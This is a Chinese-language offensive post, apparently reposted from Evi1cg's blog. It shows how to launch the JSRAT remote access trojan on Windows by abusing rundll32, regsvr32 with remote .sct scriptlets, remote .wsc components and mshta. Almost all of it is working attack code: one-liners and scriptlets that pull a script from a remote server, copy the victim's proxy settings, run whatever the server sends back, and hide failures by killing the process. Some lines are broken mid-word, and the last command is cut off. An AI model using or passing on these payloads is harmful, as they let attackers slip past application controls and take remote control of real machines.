1.默认方式
1 | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();
h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open
"GET","http://127.0.0.1:8081/connect",false);try{h.Send();
b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shel l").
Run("cmd /c ta skkill /f /im rundll32.exe",0,true);}%
|
2.Use SCT
运行计算器:
| regsvr32 /u /s /i:http://urlto/calc.sct scrobj.dll
|
calc.sct:
| <?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{20001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll -->
<!-- regsvr32 /s /i:http://server/Backdoor.sct scrobj.dll -->
<!-- That should work over a proxy and SSL/TLS... -->
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
<public>
<method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
function Exec()
{
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
}
]]>
</script>
</scriptlet>
|
运行JSRAT:
regsvr32 /s /n /u /i:http://urlto/JSRAT.sct scrobj.dll
JSRAT.sct
| <?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();
h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript.Shell\");
try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\
Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}
catch(e){}h.Open(\"GET\",\"http://127.0.0.1/connect\",false);try{h.Send();B=h.ResponseText;
eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /
im rundll32.exe\",0,true);}";
new ActiveXObject("WScript.Shell").Run(rat,0,true);
]]>
</script>
</registration>
</scriptlet>
|
3.Use WSC
运行计算器
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetO
bject
("scrip
t:http://urlto/calc.wsc")
calc.wsc
| <?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</component>
</package>
|
运行JSRAT
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject
("script:http://urlto/JSRAT.wsc")
JSRAT.wsc:
| <?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write
();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript
.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion
\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy
(2,q);}catch(e){}h.Open(\"GET\",\"http://127.0.0.1/connect\",false);try{h.Send();B=h.
ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c
taskkill /f /im rundll32.exe\",0,true);}";
new ActiveXObject("WScript.Shell").Run(rat,0,true);
]]>
</script>
</component>
</package>
|
4.Use MSHTA
1 | mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXOb
|
文章出处:Evi1cg's blog
原文链接:
https://evi1cg.me/archives/Run_JSRAT.html
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650460123&idx=3&sn=7bc51121774148c6b994c08d850cb5fb&chksm=83bbaa3fb4cc2329b44fb7a35a10f26d7f6feab3f68cbae42c4b2aaa34b35de63b9e10f6baee#rd
如有侵权请联系:admin#unsafe.sh